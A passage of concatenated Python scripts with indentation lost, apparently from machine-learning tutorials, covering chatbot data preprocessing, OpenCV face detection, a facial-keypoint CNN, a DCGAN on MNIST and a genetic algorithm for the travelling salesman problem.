'_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
'_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
'_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
'_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
'_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
'_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
'_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
'_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
'_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
'_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
'_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
'_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
english_words = { word.strip() for word in open("data/words8.txt") }
embedding_words = set()
f = open("data/glove.6B.300d.txt", encoding='utf8')
for line in tqdm.tqdm(f, "Reading GloVe words"):
values = line.split()
word = values[0]
embedding_words.add(word)
maps = open("data/maps.txt").readlines()
word_mapper = {}
for map in maps:
key, value = map.split("=>")
key = key.strip()
value = value.strip()
print(f"Mapping {key} to {value}")
word_mapper[key.lower()] = value
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
global unks
global digits
global mapped
global english
global special
result = []
append = result.append
words = line.split()
for word in words:
word = word.lower()
if word.isdigit():
append(p.number_to_words(word))
digits += 1
continue
if word in word_mapper:
append(word_mapper[word])
mapped += 1
continue
if word in english_words:
append(word)
english += 1
continue
if word in special_words:
append(word)
special += 1
continue
append("_unk_")
unks += 1
return ' '.join(result)
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
with open(file, encoding='utf8') as f:
for line in f:
line = line.strip()
if "Q: " in line:
X.append(line)
elif "A: " in line:
y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)
with open("data/questions", "w") as f:
for line in tqdm.tqdm(X, "Writing questions"):
line = line.strip().lstrip('Q: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
for line in tqdm.tqdm(y, "Writing answers"):
line = line.strip().lstrip('A: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
return keypoints * 50 + 100
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# # construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
face_image = image.copy()[y: y+h, x: x+w]
face_image = normalize_image(face_image)
keypoints = get_single_prediction(model, face_image)
show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
for keypoint in predicted_keypoints:
image = cv2.circle(image, (keypoint[0], keypoint[1]), 2, color=2)
if true_keypoints is not None:
image = cv2.circle(image, (true_keypoints[:, 0], true_keypoints[:, 1]), 2, color="green")
return image
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# make a copy of the original image
image = frame.copy()
image = normalize_image(image)
keypoints = get_single_prediction(model, image)
print(keypoints[0])
keypoints = untransform(keypoints)
# w, h = frame.shape[:2]
# keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
# frame = show_keypoints_cv2(frame, keypoints)
image = show_keypoints_cv2(image, keypoints)
cv2.imshow("frame", image)
if cv2.waitKey(1) == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
def smoothL1(y_true, y_pred):
HUBER_DELTA = 0.5
x = K.abs(y_true - y_pred)
x = K.switch(x < HUBER_DELTA, 0.5 * x ** 2, HUBER_DELTA * (x - 0.5 * HUBER_DELTA))
return K.sum(x)
def create_model(input_shape, output_shape):
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# # model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(256))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(output_shape, activation="linear"))
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
def create_mobilenet_model(input_shape, output_shape):
model = MobileNetV2(input_shape=input_shape)
# remove the last layer
model.layers.pop()
# freeze all the weights of the model except for the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our output dense layer
output = Dense(output_shape, activation="linear")
# connect it to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
model.summary()
# training the model using adam optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
IMAGE_SIZE = (224, 224)
OUTPUT_SHAPE = (68, 2)
BATCH_SIZE = 20
EPOCHS = 30
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints):
predicted_keypoints = untransform(predicted_keypoints)
true_keypoints = untransform(true_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def untransform(keypoints):
return keypoints *224
# # construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
for i in range(50):
show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
# show the image
plt.imshow(image)
# use scatter() to plot the keypoints in the faces
plt.scatter(key_points[:, 0], key_points[:, 1], s=20, marker=".")
plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
callbacks=[tensorboard],
verbose=1)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
# predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
# true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def resize_image(image, image_size):
return cv2.resize(image, image_size)
def random_crop(image, keypoints):
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
keypoints = keypoints.reshape(-1, 2)
try:
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
except ValueError:
return image, keypoints
image = image[top: top + new_h, left: left + new_w]
keypoints = keypoints - [left, top]
return image, keypoints
def normalize_image(image, to_gray=True):
if image.shape[2] == 4:
# if the image has an alpha color channel (opacity)
# let's just remove it
image = image[:, :, :3]
# get the height & width of image
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
# scaling the image to that IMAGE_SIZE
# image = cv2.resize(image, (new_w, new_h))
image = resize_image(image, (new_w, new_h))
if to_gray:
# convert image to grayscale
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# normalizing pixels from the range [0, 255] to [0, 1]
image = image / 255.0
if to_gray:
image = np.expand_dims(image, axis=2)
return image
def normalize_keypoints(image, keypoints):
# get the height & width of image
h, w = image.shape[:2]
# reshape to coordinates (x, y)
# i.e converting a vector of (136,) to the 2D array (68, 2)
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
keypoints = keypoints.reshape(-1, 2)
# scale the keypoints also
keypoints = keypoints * [new_w / w, new_h / h]
keypoints = keypoints.reshape(-1)
# normalizing keypoints from [0, IMAGE_SIZE] to [0, 1] (experimental)
keypoints = keypoints / 224
# keypoints = (keypoints - 100) / 50
return keypoints
def normalize(image, keypoints, to_gray=True):
image, keypoints = random_crop(image, keypoints)
return normalize_image(image, to_gray=to_gray), normalize_keypoints(image, keypoints)
def load_data(csv_file, to_gray=True):
# read the training dataframe
df = pd.read_csv(csv_file)
all_keypoints = np.array(df.iloc[:, 1:])
image_names = list(df.iloc[:, 0])
# load images
X, y = [], []
X = np.zeros((len(image_names), *IMAGE_SIZE, 3), dtype="float32")
y = np.zeros((len(image_names), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
for i, (image_name, keypoints) in enumerate(zip(tqdm(image_names, "Loading " + os.path.basename(csv_file)), all_keypoints)):
image = mpimg.imread(os.path.join("data", "training", image_name))
image, keypoints = normalize(image, keypoints, to_gray=to_gray)
X[i] = image
y[i] = keypoints
return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
def __init__(self, img_x=28, img_y=28, img_z=1):
self.img_x = img_x
self.img_y = img_y
self.img_z = img_z
self.D = None # discriminator
self.G = None # generator
self.AM = None # adversarial model
self.DM = None # discriminator model
def discriminator(self):
if self.D:
return self.D
self.D = Sequential()
depth = 64
dropout = 0.4
input_shape = (self.img_x, self.img_y, self.img_z)
self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
# convert to 1 dimension
self.D.add(Flatten())
self.D.add(Dense(1, activation="sigmoid"))
print("="*50, "Discriminator", "="*50)
self.D.summary()
return self.D
def generator(self):
if self.G:
return self.G
self.G = Sequential()
dropout = 0.4
# covnerting from 100 vector noise to dim x dim x depth
# (100,) to (7, 7, 256)
depth = 64 * 4
dim = 7
self.G.add(Dense(dim*dim*depth, input_dim=100))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Reshape((dim, dim, depth)))
self.G.add(Dropout(dropout))
# upsampling to (14, 14, 128)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# up to (28, 28, 64)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 32)
self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 1) (img)
self.G.add(Conv2DTranspose(1, 5, padding="same"))
self.G.add(Activation("sigmoid"))
print("="*50, "Generator", "="*50)
self.G.summary()
return self.G
def discriminator_model(self):
if self.DM:
return self.DM
# optimizer = RMSprop(lr=0.001, decay=6e-8)
optimizer = Adam(0.0002, 0.5)
self.DM = Sequential()
self.DM.add(self.discriminator())
self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.DM
def adversarial_model(self):
if self.AM:
return self.AM
# optimizer = RMSprop(lr=0.001, decay=3e-8)
optimizer = Adam(0.0002, 0.5)
self.AM = Sequential()
self.AM.add(self.generator())
self.AM.add(self.discriminator())
self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.AM
class MNIST:
def __init__(self):
self.img_x = 28
self.img_y = 28
self.img_z = 1
self.steps = 0
self.load_data()
self.create_models()
# used image indices
self._used_indices = set()
def load_data(self):
(self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
# reshape to (num_samples, 28, 28 , 1)
self.X_train = np.expand_dims(self.X_train, axis=-1)
self.X_test = np.expand_dims(self.X_test, axis=-1)
def create_models(self):
self.GAN = GAN()
self.discriminator = self.GAN.discriminator_model()
self.adversarial = self.GAN.adversarial_model()
self.generator = self.GAN.generator()
discriminators = glob.glob("discriminator_*.h5")
generators = glob.glob("generator_*.h5")
adversarial = glob.glob("adversarial_*.h5")
if len(discriminators) != 0:
print("[+] Found a discriminator ! Loading weights ...")
self.discriminator.load_weights(discriminators[0])
if len(generators) != 0:
print("[+] Found a generator ! Loading weights ...")
self.generator.load_weights(generators[0])
if len(adversarial) != 0:
print("[+] Found an adversarial model ! Loading weights ...")
self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
self.adversarial.load_weights(adversarial[0])
def get_unique_random(self, batch_size=256):
indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# while in_used_indices:
# indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# self._used_indices |= set(indices)
# if len(self._used_indices) > self.X_train.shape[0] // 2:
# if used indices is more than half of training samples, clear it
# that is to enforce it to train at least more than half of the dataset uniquely
# self._used_indices.clear()
return indices
def train(self, train_steps=2000, batch_size=256, save_interval=0):
noise_input = None
steps = tqdm.tqdm(list(range(self.steps, train_steps)))
fake = np.zeros((batch_size, 1))
real = np.ones((batch_size, 1))
for i in steps:
real_images = self.X_train[self.get_unique_random(batch_size)]
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
noise = np.random.normal(size=(batch_size, 100))
fake_images = self.generator.predict(noise)
# get 256 real images and 256 fake images
d_loss_real = self.discriminator.train_on_batch(real_images, real)
d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# X = np.concatenate((real_images, fake_images))
# y = np.zeros((2*batch_size, 1))
# 0 for fake and 1 for real
# y[:batch_size, :] = 1
# shuffle
# shuffle_in_unison(X, y)
# d_loss = self.discriminator.train_on_batch(X, y)
# y = np.ones((batch_size, 1))
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
# fool the adversarial, telling him everything is real
a_loss = self.adversarial.train_on_batch(noise, real)
log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
steps.set_description(log_msg)
if save_interval > 0:
noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
if (i + 1) % save_interval == 0:
self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
self.discriminator.save(f"discriminator_{i+1}.h5")
self.generator.save(f"generator_{i+1}.h5")
self.adversarial.save(f"adversarial_{i+1}.h5")
def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
filename = "mnist_fake.png"
if fake:
if noise is None:
noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
else:
filename = f"mnist_{step}.png"
images = self.generator.predict(noise)
else:
i = np.random.randint(0, self.X_train.shape[0], samples)
images = self.X_train[i]
if noise is None:
filename = "mnist_real.png"
plt.figure(figsize=(10, 10))
for i in range(images.shape[0]):
plt.subplot(4, 4, i+1)
image = images[i]
image = np.reshape(image, (self.img_x, self.img_y))
plt.imshow(image, cmap="gray")
plt.axis("off")
plt.tight_layout()
if save2file:
plt.savefig(filename)
plt.close("all")
else:
plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
if __name__ == "__main__":
mnist_gan = MNIST()
mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
mnist_gan.plot_images(fake=True, save2file=True)
mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
def __init__(self, object):
self.object = object
def update(self, new):
self.object = new
def __repr__(self):
return self.object
def __str__(self):
return self.object
class GeneticAlgorithm:
"""General purpose genetic algorithm implementation"""
def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
self.individual = individual
self.popsize = popsize
self.elite_size = elite_size
self.mutation_rate = mutation_rate
self.generations = generations
if not callable(fitness_func):
raise TypeError("fitness_func must be a callable object.")
self.get_fitness = fitness_func
self.plot = plot
self.prn = prn
self.population = self._init_pop()
self.animate = animation_func
def calc(self):
"""Try to find the best individual.
This function returns (initial_individual, final_individual, """
sorted_pop = self.sortpop()
initial_route = self.population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
progress = [ distance ]
if callable(self.animate):
self.plot = True
individual = Individual(initial_route)
stop_animation = Event()
self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
else:
self.plot = False
if self.prn:
print(f"Initial distance: {distance}")
try:
if self.plot:
for i in range(self.generations):
population = self.next_gen()
sorted_pop = self.sortpop()
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
individual.update(route)
else:
for i in range(self.generations):
population = self.next_gen()
distance = 1 / self.sortpop()[0][1]
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
try:
stop_animation.set()
except NameError:
pass
final_route_index = self.sortpop()[0][0]
final_route = population[final_route_index]
if self.prn:
print("Final route:", final_route)
return initial_route, final_route, distance
def create_population(self):
return random.sample(self.individual, len(self.individual))
def _init_pop(self):
return [ self.create_population() for i in range(self.popsize) ]
def sortpop(self):
"""This function calculates the fitness of each individual in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(self):
sorted_pop = self.sortpop()
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
df['cum_sum'] = df['Fitness'].cumsum()
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
for i in range(len(sorted_pop) - self.elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ self.population[index] for index in result ]
def breed(self, parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(self, selection):
pool = random.sample(selection, len(selection))
children = [selection[i] for i in range(self.elite_size)]
children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
return children
def mutate(self, individual):
individual_length = len(individual)
for swapped in range(individual_length):
if(random.random() < self.mutation_rate):
swap_with = random.randint(0, individual_length-1)
individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
return individual
def mutate_population(self, children):
return [ self.mutate(individual) for individual in children ]
def next_gen(self):
selection = self.selection()
children = self.breed_population(selection)
self.population = self.mutate_population(children)
return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for i, city in enumerate(route):
if i == 0:
col.text(city.x-5, city.y+5, "Start")
col.scatter(city.x, city.y, s=70, c='g')
else:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
def animate():
nonlocal route
_, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
if isinstance(route, Individual):
target = route.object
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for i, city in enumerate(target):
if i == 0:
ax1[0].text(city.x-5, city.y+5, "Start")
ax1[0].scatter(city.x, city.y, s=70, c='g')
else:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
if plot_conclusion:
initial_route = plot_conclusion
plot_routes(initial_route, target)
Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
def get_fitness(route):
def get_distance():
distance = 0
for i in range(len(route)):
from_city = route[i]
to_city = route[i+1] if i+1 < len(route) else route[0]
distance += (from_city - to_city)
return distance
return 1 / get_distance()
